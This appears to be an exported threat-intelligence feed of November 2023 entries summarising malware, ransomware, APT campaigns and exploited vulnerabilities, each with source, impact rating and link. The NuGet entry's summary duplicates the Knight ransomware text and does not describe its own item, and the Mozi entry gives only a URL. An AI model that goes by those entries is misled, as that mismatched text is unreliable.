Summary:: OracleIV is a Dockerized Distributed Denial of Service (DDoS) botnet. This malware targets publicly-exposed Docker Engine API instances, exploiting misconfigurations to deliver a malicious Docker container. The container, named "oracleiv_latest," contains Python malware compiled as an ELF executable, capable of performing various DoS attacks. Attackers initiate access through a HTTP POST request to Docker's API, pulling the malicious image from Dockerhub. The malware connects to a Command and Control server for instructions, using novel authentication methods

Source: https://www.cadosecurity.com/oracleiv-a-dockerised-ddos-botnet/

Intel Source:: Blackberry

Intel Name:: BiBi_Wiper

Date of Scan:: 2023-11-14

Impact:: LOW

Summary:: BiBi Wiper is a malware originally targeting Linux systems and now adapted to run on Windows.This malware is designed to cause data destruction without leaving a ransom note or command-and-control servers. Its name, "BiBi," references the nickname of Israeli Prime Minister Benjamin Netanyahu and is hardcoded into the malware. The Windows version of BiBi Wiper employs advanced techniques to maximize damage, including running multiple threads and targeting specific file types for destruction, while sparing essential system files. As the conflict continues, the use of such wipers in cyber warfare is expected to increase, highlighting the intertwining of physical and cyber conflicts

Source: https://blogs.blackberry.com/en/2023/11/bibi-wiper-used-in-the-israel-hamas-war-now-runs-on-windows

Intel Source:: Security Boulevard

Intel Name:: Atom_Keylogger

Date of Scan:: 2023-11-14

Impact:: LOW

Summary:: Atom Keylogger is a budget-friendly and user-friendly malware aimed at aspiring cybercriminals. Sold on cybercrime forums for around $15 and payable through cryptocurrencies like Bitcoin, is designed to secretly record keystrokes and other user activities on infected computers. This functionality enables the theft of sensitive information such as passwords, credit card numbers, and personal data. Atom Keylogger's low cost, ease of use, and stealthy capabilities make it a significant threat in the cybercrime landscape, allowing even unskilled individuals to engage in cybercrime and identity theft.

Source: https://securityboulevard.com/2023/11/atom-keylogger-the-budget-friendly-malware-for-aspiring-cybercriminals/

Intel Source:: CISA

Intel Name:: Royal_Ransomware_November2023

Date of Scan:: 2023-11-14

Impact:: HIGH

Summary:: Since September 2022, Royal has targeted over 350 known victims worldwide and ransomware demands have exceeded 275 million USD. Royal conducts data exfiltration and extortion prior to encryption and then publishes victim data to a leak site if a ransom is not paid. Phishing emails are among the most successful vectors for initial access by Royal threat actors. There are indications that Royal may be preparing for a re-branding effort and/or a spinoff variant. Blacksuit ransomware shares a number of identified coding characteristics similar to Royal. A previous joint CSA for Royal ransomware was published on March 2, 2023. This joint CSA provides updated IOCs identified through FBI investigations.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

Intel Source:: Rexorvc0

Intel Name:: SystemBC_Coroxy_DroxiDat

Date of Scan:: 2023-11-13

Impact:: MEDIUM

Summary:: SystemBC is a versatile malware known as Coroxy or DroxiDat, which functions as proxy malware, a bot, a backdoor, and even a Remote Access Trojan (RAT). Active since 2018, it's popular in underground markets and is used by various threat actors for different purposes, including reconnaissance, lateral movement, and deploying additional malware. SystemBC typically gathers system and user information, establishes persistence, and creates a Socks5 connection with a Command and Control server. Various groups have used SystemBC, many linked to ransomware activities.

Source: https://rexorvc0.com/2023/11/12/Swiss-Knife-SystemBC-Coroxy/

Intel Source:: Bitdefender

Intel Name:: Hive_Ransomware_Offspring

Date of Scan:: 2023-11-13

Impact:: MEDIUM

Summary:: The recent emergence of Hunters International, a new ransomware group, follows the FBI-led dismantlement of Hive, a notorious ransomware collective. Despite Hive's shutdown and the FBI's efforts to mitigate damage by distributing decryption keys, this new group appears to have adopted Hive's assets and technology. Hunters International distinguishes itself by focusing more on data exfiltration rather than encryption, and has simplified its ransomware code, now written in Rust, a language favored for its security features. Their approach reflects the evolving landscape of cyber threats, highlighting the persistence and adaptability of such groups in the face of law enforcement actions.

Source: https://www.bitdefender.com/blog/businessinsights/hive-ransomwares-offspring-hunters-international-takes-the-stage/

Intel Source:: Deep Instinct

Intel Name:: MuddyC2Go_Latest_C2_Framework_Used_by_Iranian_APT_MuddyWater_Spotted_in_Israel

Date of Scan:: 2023-11-10

Impact:: MEDIUM

Summary:: The Deep Instinct Threat Research team has discovered a new Command and Control (C2) framework named MuddyC2Go, believed to be used by the Iranian APT group MuddyWater since at least 2020. This framework, written in Go, is a shift from their previous tool, PhonyC2. MuddyWater's typical tactics involve spear-phishing to deliver malware. Recent changes include password-protected archives to evade detection and executables that connect directly to the C2, bypassing the need for manual script execution. Instances of MuddyC2Go usage were observed in various Middle Eastern countries with specific targeting of Israeli entities. Attribution to MuddyWater is based on past activities, IP address analysis, and unique URL patterns, with known servers hosted by a VPS provider associated with malicious activities. Deep Instinct recommends disabling PowerShell if not needed or monitoring its activity closely due to MuddyWater's reliance on PowerShell payloads.

Source: https://www.deepinstinct.com/blog/muddyc2go-latest-c2-framework-used-by-iranian-apt-muddywater-spotted-in-israel

Intel Source:: Crowdstrike

Intel Name:: IMPERIAL_KITTEN_Deploys_Novel_Malware_Families_in_Middle_East_Focused_Operations

Date of Scan:: 2023-11-10

Impact:: MEDIUM

Summary:: The CrowdStrike blog describes IMPERIAL KITTEN, an Iran-nexus adversary with ties to the Islamic Revolutionary Guard Corps, deploying novel malware families in cyberattacks targeting the Middle East, specifically transportation, logistics, and technology sectors in October 2023. The group uses tactics like public scanning tools, exploits, and stolen VPN credentials for access; employs PAExec and credential theft for lateral movement; and utilizes custom malware for data exfiltration. Malware like IMAPLoader, StandardKeyboard, and a Python reverse shell delivered via Excel documents are highlighted. IMPERIAL KITTEN's activity is characterized by social engineering with a focus on Israeli organizations, and the blog provides a detailed analysis of the group's tooling and methods.

Source: https://www.crowdstrike.com/blog/imperial-kitten-deploys-novel-malware-families/

Intel Source:: ISC.SANS

Intel Name:: Code_Injection_Examples_in_Visual_Form

Date of Scan:: 2023-11-10

Impact:: LOW

Summary:: These days, code injection techniques (such as MITRE's T1055) are frequently used. An attacker can conceal harmful code within a legitimate process in a pleasant fashion this way. A variation on this method is known as "Process Hollowing," in which malicious code replaces the legitimately suspended process's code. Calling Microsoft API functions such as VirtualAllocEx(), NtUnmapViewOfSecrio(), and WriteProcessMemory() allows for code injection.

Source: https://isc.sans.edu/diary/Visual+Examples+of+Code+Injection/30388/

Intel Source:: Red Canary

Intel Name:: Adversaries_exploit_Confluence_vulnerability_to_deploy_ransomware

Date of Scan:: 2023-11-10

Impact:: MEDIUM

Summary:: Red Canary reported the exploitation of Atlassian Confluence CVE-2023-22518, leading to attempts to deploy Cerber ransomware. The vulnerability allows unauthenticated users to upload a .zip file to Confluence instances, enabling data destruction or remote code execution. Red Canary suggests updating Confluence to the versions specified by Atlassian to mitigate the risk. The observed attack involved uploading a web shell, running reconnaissance commands, and executing encoded PowerShell to download ransomware.

Source: https://redcanary.com/blog/confluence-exploit-ransomware/

Intel Source:: SysAid

Intel Name:: SysAid_On_Prem_Software_CVE_2023_47246_Vulnerability

Date of Scan:: 2023-11-10

Impact:: LOW

Summary:: A vulnerability was identified in SysAid's on-premises software, leading to an immediate response and communication with customers to implement a mitigation solution. The zero-day vulnerability allowed the Lace Tempest group to execute code and deploy the GraceWire trojan via a WebShell. Users are urged to update SysAid systems to version 23.3.36 and perform a network compromise assessment. The attack involved path traversal, PowerShell scripts to launch malware and erase evidence, and the use of a CobaltStrike agent.

Source: https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification

Intel Source:: TrendMicro

Intel Name:: How_Kopeechka_an_Automated_Social_Media_Accounts_Creation_Service_Can_Facilitate_Cybercrime

Date of Scan:: 2023-11-10

Impact:: LOW

Summary:: Kopeechka is a service active since 2019, facilitating automated registration of social media accounts by bypassing email verification and CAPTCHAs. It offers temporary access to emails for account confirmation without providing actual mailbox access, enabling the creation of accounts on various platforms. Kopeechka also provides integration with online SMS services for phone verification. This service, while not illegal, supports large-scale cybercrime activities such as spamming and misinformation by allowing the creation of numerous accounts quickly and inexpensively. The emergence of such services underscores the professionalization of cybercrime and the need for stronger security measures by social media platforms.

Source: https://www.trendmicro.com/en_us/research/23/j/how-kopeechka--an-automated-social-media-accounts-creation-servi.html?utm_source=trendmicroresearch&utm_medium=smk&utm_campaign=1023_kpeechka

Intel Source:: TrendMicro

Intel Name:: Hackers_Harvesting_Credentials_Using_File_Sharing_Services_and_Reverse_Proxies

Date of Scan:: 2023-11-10

Impact:: LOW

Summary:: Researchers at Trend Micro have examined a phishing effort that involves malicious emails that link to a file-sharing program. The second link in the email takes users to a PDF document that contains a secondary link that is intended to capture session cookies and login credentials.

Source: https://www.trendmicro.com/en_us/research/23/k/threat-actors-leverage-file-sharing-service-and-reverse-proxies.html

Intel Source:: Unit 42

Intel Name:: EleKtra_Leak_Tracking_Malicious_Operations_of_Exposed_IAM_Keys

Date of Scan:: 2023-11-10

Impact:: LOW

Summary:: Unit 42 researchers have uncovered an active campaign named EleKtra-Leak which targets exposed IAM credentials within public GitHub repositories. The campaign, believed to be ongoing for at least two years, involves creating AWS EC2 instances for cryptojacking operations. The threat actors can exploit exposed credentials within five minutes of their appearance on GitHub.

Source: https://unit42.paloaltonetworks.com/malicious-operations-of-exposed-iam-keys-cryptojacking/

Intel Source:: Cisco Talos

Intel Name:: Spammers_abuse_Google_Forms_quiz_to_deliver_scams

Date of Scan:: 2023-11-10

Impact:: LOW

Summary:: Cisco Talos has recently observed an increase in spam messages abusing a feature of quizzes created within Google Forms. In particular, spammers have discovered that they can create a new quiz in Google Forms, use the victim’s email address to respond to the quiz, and then abuse the “Release Scores” feature of the Google Form to deliver their spam to the victim. Because the spam messages emanate from Google itself, the messages have a good chance of landing in the victim’s inbox.

Source: https://blog.talosintelligence.com/google-forms-quiz-spam/

Intel Source:: Malwarebytes

Intel Name:: Adversary_Using_Fake_PC_News_Website_to_Spread_Information_Stealers

Date of Scan:: 2023-11-09

Impact:: LOW

Summary:: Researchers at Malwarebytes have discovered that a threat actor is replicating WindowsReport.com, a reputable Windows news page, in order to propagate a malicious installer for CPU-Z, a well-known processor tool.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/11/malvertiser-copies-pc-news-site-to-deliver-infostealer

Intel Source:: Twitter, GitHub, Abuse.ch, Palo Alto

Intel Name:: The_Pikabot_malware_activity

Date of Scan:: 2023-11-09

Impact:: MEDIUM

Summary:: Unit 42, Palo Alto researchers saw Pikabot malware is being spread by TA577 like many others throughout this week. They and others collected indicators of compromise (IOCs) from last couple days of the infection. TA577 - a threat actor acting as initial access broker (IAB) for ransomware, targeting western organisation, URLs leading to a password-protected zip (pass H17) containing a JavaScript file which uses cURL to run PikaBot.

Source: https://twitter.com/threatinsight/status/1721983400611864640 https://bazaar.abuse.ch/browse/signature/pikabot/ https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2023-11-02-IOCs-for-TA577-Pikabot-activity.txt https://github.com/threatlabz/iocs/blob/main/pikabot/c2s_20231102.txt https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_02.11.2023.txt https://www.agid.gov.it/it/agenzia/stampa-e-comunicazione/notizie/2023/10/31/attenzione-al-malware-pikabot-false-mail-comunicano-enti-lavvenuta-federazione-spid

Intel Source:: Checkmarx

Intel Name:: BlazeStealer_Malware_Found_in_Python_Packages_on_PyPI

Date of Scan:: 2023-11-09

Impact:: LOW

Summary:: The ultimate goal of a fresh batch of malicious Python packages that have made their way into the Python Package Index (PyPI) repository is to steal private data from developer systems that have been breached. The packages contain malware known as BlazeStealer, while appearing to be harmless obfuscation tools.

Source: https://checkmarx.com/blog/python-obfuscation-traps/?

Intel Source:: ISC.SANS

Intel Name:: Project_File_Example_for_Phishing_Campaign

Date of Scan:: 2023-11-09

Impact:: LOW

Summary:: ISC.SANS researchers have discovered a fascinating file on VT. Because the file included a reference to one of their customers' domains, it set off one of their hunting rules. They looked at the "EwoExcel (1).mmp" file. Though it was made in 2022, the file was just uploaded to VT. These kinds of papers are handled using a program known as "GammaDyne." The program can work with the file and extract its secrets. It includes information on a well-known phishing campaign initiative.

Source: https://isc.sans.edu/diary/Example+of+Phishing+Campaign+Project+File/30384

Intel Source:: ASEC

Intel Name:: Distribution_of_LockBit_Ransomware_and_Vidar_Infostealer

Date of Scan:: 2023-11-09

Impact:: MEDIUM

Summary:: One of the primary ways the LockBit ransomware spreads is through the use of resume impersonation. In February of this year, information on this was posted on the ASEC Blog. It has been verified that the most recent deployments also contain an Infostealer, as opposed to earlier ones that simply contained the LockBit ransomware.

Source: https://asec.ahnlab.com/en/58750/

Intel Source:: Mandiant

Intel Name:: Ukraine_Power_Grid_Downed_by_Sandworms

Date of Scan:: 2023-11-09

Impact:: MEDIUM

Summary:: The notorious Sandworm advanced persistent threat (APT) organization from Russia employed live-off-the-land (LotL) tactics to cause a power outage in a Ukrainian city in October 2022, which was followed by a flurry of missile strikes.

Source: https://www.mandiant.com/resources/blog/sandworm-disrupts-power-ukraine-operational-technology

Intel Source:: Palo Alto

Intel Name:: Chinese_APT_Attacks_Government_of_Cambodia

Date of Scan:: 2023-11-09

Impact:: MEDIUM

Summary:: Researchers from Palo Alto have discovered harmful Chinese APT infrastructure that poses as cloud backup services. They saw network connections mostly coming from Cambodia while keeping an eye on telemetry linked to two well-known Chinese APT groups. These connections included inbound connections coming from at least 24 government entities in Cambodia.

Source: https://unit42.paloaltonetworks.com/chinese-apt-linked-to-cambodia-government-attacks/

Intel Source:: Sentilone

Intel Name:: An_Infostealer_Powered_by_ChatGPT_Aims_at_Cloud_Platforms

Date of Scan:: 2023-11-09

Impact:: LOW

Summary:: Researchers at SentinelLabs have discovered a brand-new infostealer and hacking tool named "Predator AI" that targets cloud services and is based on Python. To improve the tool's usability and provide a unified text-driven interface for various functions, the Predator AI developer incorporated a ChatGPT-driven class into the Python script.

Source: https://www.sentinelone.com/labs/predator-ai-chatgpt-powered-infostealer-takes-aim-at-cloud-platforms/

Intel Source:: ASEC

Intel Name:: Notification_Regarding_Phobos_Ransomware

Date of Scan:: 2023-11-09

Impact:: LOW

Summary:: Researchers from ASEC have found that the Phobos ransomware is still operational. One variation called Phobos is well-known for having operational and technological parallels to both the Dharma and CrySis malware. These ransomware strains usually use insecure security features on Remote Desktop Protocol (RDP) services that are open to the outside world as attack vectors. Administrators are recommended to exercise caution, since ransomware dissemination frequently uses these susceptible RDPs as initial ports of entry.

Source: https://asec.ahnlab.com/en/58753/

Intel Source:: Seqrite

Intel Name:: A_Look_at_Its_Function_in_Distribution_of_Malware

Date of Scan:: 2023-11-09

Impact:: LOW

Summary:: Researchers from Seqrite have seen the use of a batloader to administer Agent Tesla. It's not exclusive to this particular virus strain, though. It has also been regularly noted that this batloader aids in the injection of other malware families. Even if the coding could differ slightly, the fundamental process is very constant.

Source: https://www.seqrite.com/blog/casting-light-on-batloader-an-insight-into-its-role-in-malware-delivery/

Intel Source:: SOC Radar

Intel Name:: New_Gootloader_Variant_GootBot

Date of Scan:: 2023-11-08

Impact:: LOW

Summary:: SOCRadar researchers have discovered a new Gootloader malware version called "GootBot," which is utilized in SEO poisoning campaigns. This version adds capabilities that make it harder for enterprises to identify or stop threat actors from moving laterally within compromised systems.

Source: https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/

Intel Source:: Jamf, Security Week

Intel Name:: New_macOS_malware_used_by_North_Korean_hackers

Date of Scan:: 2023-11-08

Impact:: MEDIUM

Summary:: A new macOS malware was sispicious to be used by North Korean hackers to target crypto exchanges submitted by security firm Jamf. The group is responsible for the malware is suspected to be the same group behind the recently reported KandyKorn malware.

Source: https://www.jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/ https://www.securityweek.com/new-macos-malware-linked-to-north-korean-hackers/

Intel Source:: Uptycs

Intel Name:: From_Combating_ISIS_to_Potentially_Using_RaaS_to_Target_Israel

Date of Scan:: 2023-11-08

Impact:: LOW

Summary:: GhostLocker, a novel ransomware-as-a-service (RaaS) infrastructure, was disclosed by the hacking organization GhostSec. Through a dedicated Telegram channel, they offer consumers interested in purchasing this service extensive guidance. GhostSec is currently concentrating its attacks on Israel. This action is an unexpected divergence from their prior endeavors and declared goals.

Source: https://www.uptycs.com/blog/ghostlocker-ransomware-ghostsec

Intel Source:: Cyfirma

Intel Name:: A_new_threat_the_Millenium_RAT_details

Date of Scan:: 2023-11-08

Impact:: LOW

Summary:: Cyfirma team observed a new RAT on GitHub, available for purchase. The analysts shared their in-depth investigation report of the Millenium-RAT, version 2.4; a Win32 executable built on .NET. At hte same time, the RAT is actively under development, with a new version, 2.5, just released.

Source: https://www.cyfirma.com/outofband/unveiling-a-new-threat-the-millenium-rat/

Intel Source:: Esentire

Intel Name:: An_infection_by_the_NetWire_RAT

Date of Scan:: 2023-11-08

Impact:: LOW

Summary:: In September 2023, the eSentire Threat reserachers discovered and prevented an infection by the NetWire RAT. NetWire is a publicly available remote administration tool which steals password-stealing and keylogging capabilities.

Source: https://www.esentire.com/blog/netwire-rat-the-stealthy-invasion-via-frenchy-shellcode

Intel Source:: Krebsonsecurity

Intel Name:: SWAT_USA_Drop_Service_Exposed

Date of Scan:: 2023-11-08

Impact:: LOW

Summary:: Researchers from KrebsonSecurity have identified SWAT USA Drop Service. Based in Russia, this organization employs more than 1,200 individuals across the United States to reship stolen merchandise acquired with pilfered credit card information.

Source: https://krebsonsecurity.com/2023/11/russian-reshipping-service-swat-usa-drop-exposed/

Intel Source:: nccgroup

Intel Name:: A_deeper_dive_into_the_D0nut_extortion_group

Date of Scan:: 2023-11-08

Impact:: LOW

Summary:: NCC Group took a deeper look at the D0nut extortion group. The D0nut extortion group was first have seen last year for breaking in the networks and demanding money in return for not leaking stolen data. There is also suspected ties between D0nut affiliates and both Hive and Ragnar Locker ransomware operations.

Source: https://research.nccgroup.com/2023/11/06/d0nut-encrypt-me-i-have-a-wife-and-no-backups/

Intel Source:: Esentire

Intel Name:: A_Journey_From_DarkGate_to_DanaBot

Date of Scan:: 2023-11-08

Impact:: LOW

Summary:: Early in June 2023, a Russian-speaking hacking site first advertised the sale of DarkGate, a loader developed in Borland Delphi. According to the loader developer, they started working on the project in 2017. Among the many functions offered by DarkGate are hVNC, hAnyDesk, rootkit, reverse proxy, keylogger, crypto mining, credentials theft, and remote desktop. The cost of the loader is $1,000 for a single use and $15,000 for recurring use.

Source: https://www.esentire.com/blog/from-darkgate-to-danabot

Intel Source:: Security Intelligence

Intel Name:: Hive0051s_Large_Scale_Malicious_Operations

Date of Scan:: 2023-11-07

Impact:: MEDIUM

Summary:: Last month, IBM X-Force has started to see a huge spike in Hive0051’s activity with the new multi-channel approach of rapidly rotating C2 infrastructure infecting at least 1,027 active infections featuring more than 327 unusual malicious domains observed in a 24-hour period.

Source: https://securityintelligence.com/x-force/hive0051-malicious-operations-enabled-dns-fluxing/

Intel Source:: Cyfirma

Intel Name:: Good_Day_ransomware_of_the_week

Date of Scan:: 2023-11-07

Impact:: MEDIUM

Summary:: CYFIRMA researchers has dicovered ransomware known as Good Day ransomware while monitoring various underground forums as part of our Threat Discovery Process.

Source: https://www.cyfirma.com/news/weekly-intelligence-report-03-nov-2023/

Intel Source:: Cyble

Intel Name:: A_new_open_source_stealer_named_Trap_Stealer

Date of Scan:: 2023-11-07

Impact:: LOW

Summary:: Cyble researchers shared their deep insights about a new info stealer known as “Trap Stealer” – an open-source Python-based program. The developer of this stealer claims that it is designed to extract a wide range of sensitive data from compromised systems in just 6 seconds.

Source: https://cyble.com/blog/new-open-source-trap-stealer-pilfers-data-in-just-6-seconds/

Intel Source:: Seqrite

Intel Name:: SideCopy_s_multi_platform_attacks

Date of Scan:: 2023-11-07

Impact:: MEDIUM

Summary:: SEQRITE Labs APT-Team has observed multiple campaigns of APT SideCopy, attacking Indian government and defense entities last couple months. The threat group is now exploiting the recent WinRAR vulnerability CVE-2023-38831 to deploy AllaKore RAT, DRat and additional payloads.

Source: https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/

Intel Source:: Intezer

Intel Name:: Malicious_PDF_files_analysis

Date of Scan:: 2023-11-07

Impact:: LOW

Summary:: Intezer analysts described in their article about the PDF format and how it can be abused to deliver malware. Then they showed how people can identify and detect a malicious PDF file using open-source and free tools.

Source: https://intezer.com/blog/incident-response/analyze-malicious-pdf-files/

Intel Source:: HC3

Intel Name:: An_Overview_of_BlackSuit_Ransomware

Date of Scan:: 2023-11-07

Impact:: MEDIUM

Summary:: Given its striking resemblance to the Royal ransomware family, BlackSuit, a relatively new ransomware group and strain, is expected to pose a serious danger to the Healthcare and Public Health (HPH) industry. Sensitive data on a vulnerable network is stolen and encrypted by BlackSuit utilizing a double extortion technique. It has only been used specifically in a few instances thus far.

Source: https://www.hhs.gov/sites/default/files/blacksuit-ransomware-analyst-note-tlpclear.pdf

Intel Source:: VMware

Intel Name:: A_Jupyter_Infostealer_Update

Date of Scan:: 2023-11-07

Impact:: MEDIUM

Summary:: New Jupyter Infostealer iterations persist in developing, incorporating minor yet significant modifications to the malware creator's methods. With this innovation, the attacker can more covertly compromise victims by avoiding detection and establishing persistence.

Source: https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html

Intel Source:: PaloAlto

Intel Name:: Agonizing_Serpens_attacks_on_the_Israeli_organizations

Date of Scan:: 2023-11-07

Impact:: MEDIUM

Summary:: Unit 42 researchers have analyzed recent attacks last month which targeting the education and technology sectors in Israel. The attacks are attempting to steal sensitive data, such as personally identifiable information (PII) and intellectual property. Unit 42's investigation showed the perpetrators of the attacks have linked to an Iranian-backed APT group Unit 42 tracks as Agonizing Serpens (aka Agrius, BlackShadow, Pink Sandstorm, DEV-0022).

Source: https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/

Intel Source:: McAfee

Intel Name:: Revealing_the_AsyncRAT_New_Infection_Network

Date of Scan:: 2023-11-06

Impact:: LOW

Summary:: Researchers at McAfee have seen that a malicious HTML file is being used to spread a recent AsyncRAT campaign. VBScript (VBS), Windows Script File (WSF), PowerShell, and other file formats are used throughout this entire infection method to evade antivirus detection.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/unmasking-asyncrat-new-infection-chain/

Intel Source:: Aquasec

Intel Name:: Kinsing_Actors_Breach_Cloud_Environments_by_Using_New_Linux_Flaw

Date of Scan:: 2023-11-06

Impact:: LOW

Summary:: Aqua Nautilus researchers have effectively stopped Kinsing's experimental forays into cloud regions. As part of Kinsing's continuous campaign, they are using a basic yet common PHPUnit vulnerability exploit attack to discover the threat actor's manual attempts to alter the Looney Tunables vulnerability (CVE-2023-4911).

Source: https://blog.aquasec.com/loony-tunables-vulnerability-exploited-by-kinsing

Intel Source:: Netskope

Intel Name:: A_Novel_Loading_Method_Employed_by_New_DarkGate_Variant

Date of Scan:: 2023-11-03

Impact:: LOW

Summary:: Recently, a new DarkGate variant distributed via MSI that uses a loading technique based on the default shellcode stub of Cobalt Strike Beacon was discovered by Netskope Threat Labs. By comparing the results of their analysis with those of other researchers, they were able to conclude that this is a new variant of the DarkGate malware.

Source: https://www.netskope.com/jp/blog/new-darkgate-variant-uses-a-new-loading-approach

Intel Source:: NCC Group

Intel Name:: A_Synopsis_of_Blisters_Malware

Date of Scan:: 2023-11-03

Impact:: LOW

Summary:: In the past, Blister a loader with an integrated payload was seen engaging in activities connected to Evil Corp. Researchers have also viewed it as a follow-up in SocGholish infections, in line with public reporting. Previously, they saw Blister mostly dropping Cobalt Strike beacons, but recent events indicate a change to Mythic agents, an additional red teaming structure.

Source: https://research.nccgroup.com/2023/11/01/popping-blisters-for-research-an-overview-of-past-payloads-and-exploring-recent-developments/

Intel Source:: BitSight

Intel Name:: Exposing_Socks5Systemz

Date of Scan:: 2023-11-03

Impact:: LOW

Summary:: Researchers from Bitsight have discovered a proxy botnet that is being delivered using two loaders that threat actors commonly use to spread malware and construct botnets: PrivateLoader and Amadey. The malware known as a proxy bot has been dubbed Socks5Systemz, which is also the name of the special login window that is always present in all of the current C2 proxy bots.

Source: https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey

Intel Source:: Cyble

Intel Name:: New_Java_Based_Sayler_RAT_Targeting_Polish_Speaking_Users

Date of Scan:: 2023-11-03

Impact:: LOW

Summary:: Researchers from Cyble discovered a Java Archive (JAR) file on VirusTotal that had zero detections. After further investigation, they were able to identify the file as a Remote Access Trojan (RAT), which they named "Sayler."

Source: https://cyble.com/blog/new-java-based-sayler-rat-targets-polish-speaking-users/

Intel Source:: HC3

Intel Name:: Analyzing_the_8Base_Ransomware_Threat

Date of Scan:: 2023-11-03

Impact:: MEDIUM

Summary:: The "8Base Ransomware Threat Analysis - HC3 Analyst Note" is a report from the U.S. Department of Health and Human Services (HHS). It discusses the emerging threat posed by the 8Base ransomware gang, focusing on its recent activities in the Healthcare and Public Health (HPH) sector.

Source: https://www.hhs.gov/sites/default/files/8base-ransomware-analyst-note.pdf

Intel Source:: Deep Instinct

Intel Name:: Iran_Group_MuddyWater_Targeting_Israel

Date of Scan:: 2023-11-02

Impact:: MEDIUM

Summary:: A fresh spear-phishing campaign targeting two Israeli businesses has been connected to the Iranian nation-state actor MuddyWater. The campaign's ultimate goal is to deliver Advanced Monitoring Agent, a genuine remote administration tool from N-able.

Source: https://www.deepinstinct.com/blog/muddywater-en-able-spear-phishing-with-new-ttps

Intel Source:: Rapid7

Intel Name:: Ransomware_Group_HelloKitty_Exploiting_Apache_ActiveMQ_Vulnerability

Date of Scan:: 2023-11-02

Impact:: LOW

Summary:: Rapid7 researchers have issued a warning regarding the potential for remote code execution in the event that a recently discovered severe security hole in the Apache ActiveMQ open-source message broker service is exploited.

Source: https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/

Intel Source:: PaloAlto

Intel Name:: The_upgraded_variant_of_Kazuar

Date of Scan:: 2023-11-02

Impact:: LOW

Summary:: Kazuar is a .NET backdoor used by Pensive Ursa as a second stage payload. It has robust code and string obfuscation techniques, a multithreaded model for enhanced performance, and a range of encryption schemes to protect its code from analysis and to conceal its data. It supports over 40 distinct commands, half of which were previously undocumented, and has anti-analysis functionalities, extensive system profiling capabilities, and is specifically targeted at cloud applications. Cortex XDR can detect and prevent the execution of Kazuar.

Source: https://unit42.paloaltonetworks.com/pensive-ursa-uses-upgraded-kazuar-backdoor/

Intel Source:: Ciberdefensa, ASEC

Intel Name:: An_Infostealer_actively_being_distributed

Date of Scan:: 2023-11-02

Impact:: MEDIUM

Summary:: This article warns against the malicious behavior of the LummaC2 infostealer, which is distributed by executing legitimate EXE files with malicious DLLs disguised as cracks and keygens. It provides IOC information, C2 information, and encourages readers to subscribe to AhnLab's TIP platform for further analysis.

Source: https://ciberdefensa.cat/archivos/28455 https://asec.ahnlab.com/en/58319/

Intel Source:: ASEC

Intel Name:: Malicious_HWP_documents_with_embedded_OLE_object

Date of Scan:: 2023-11-02

Impact:: LOW

Summary:: ASEC found malicious HWP documents embedded with OLE objects targeting individuals in specific sectors. The documents prompt users to click the OLE object, which contains a malicious URL. The second type of HWP document has a malicious script file embedded, which executes an additional script code from GitHub. When executed, files zz.bat and oz.txt are created, which contain PowerShell commands to download and execute data from GitHub.

Source: https://asec.ahnlab.com/en/58335/

Intel Source:: Fortinet

Intel Name:: Knight_Ransomware_activity

Date of Scan:: 2023-11-01

Impact:: MEDIUM

Summary:: This article provides information on the Knight ransomware dropper location, its infection vector, victimology, and data leak site. It also outlines Fortinet's protections and Indicators of Compromise (IOCs), as well as its services to help organizations protect themselves from ransomware attacks, such as the FortiPhish Phishing Simulation Service and NSE 1 – Information Security Awareness training module. Additionally, it advises against paying a ransom and outlines Fortinet's Emergency Incident Response Service, Incident Readiness Subscription Service, and FortiRecon Digital Risk Protection (DRP).

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-knight

Intel Source:: Reversing Labs

Intel Name:: NuGet_expose_to_malicious_activities_by_threat_actors

Date of Scan:: 2023-11-01

Impact:: MEDIUM

Summary:: This article provides information on the Knight ransomware dropper location, its infection vector, victimology, and data leak site. It also outlines Fortinet's protections and Indicators of Compromise (IOCs), as well as its services to help organizations protect themselves from ransomware attacks, such as the FortiPhish Phishing Simulation Service and NSE 1 – Information Security Awareness training module. Additionally, it advises against paying a ransom and outlines Fortinet's Emergency Incident Response Service, Incident Readiness Subscription Service, and FortiRecon Digital Risk Protection (DRP).

Source: https://www.reversinglabs.com/blog/iamreboot-malicious-nuget-packages-exploit-msbuild-loophole

Intel Source:: Checkpoint

Intel Name:: An_ongoing_Iranian_espionage_campaign_by_Scarred_Manticore

Date of Scan:: 2023-11-01

Impact:: LOW

Summary:: Scarred Manticore is an Iranian nation-state threat actor that deploys LIONTAIL, a backdoor, and other custom components to target government, telecommunications, military, and financial sectors in the Middle East. LIONTAIL utilizes the Windows HTTP Stack to register URL prefixes and receive requests, and uses XOR-based encryption to protect data. It also uses the WINTAPIX driver to inject shellcode into processes and execute .NET assemblies from memory.

Source: https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/

Intel Source:: Welivesecurity

Intel Name:: The_discovery_of_a_kill_switch_that_took_down_a_botnet

Date of Scan:: 2023-11-01

Impact:: LOW

Summary:: https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/

Source: https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/

Intel Source:: Talos

Intel Name:: The_estimate_of_cyber_attacks_cost

Date of Scan:: 2023-11-01

Impact:: LOW

Summary:: This article discusses the potential for estimates of cyber attack costs to create fear, uncertainty, and doubt (FUD) in the cybersecurity space. Instead of focusing on these estimates, the author suggests focusing on ways to get easy cybersecurity wins. It also provides an overview of the YoroTrooper threat actor, security headlines, upcoming events, and a list of the most prevalent malware files from Talos telemetry.

Source: https://blog.talosintelligence.com/threat-source-newsletter-oct-26-2023/

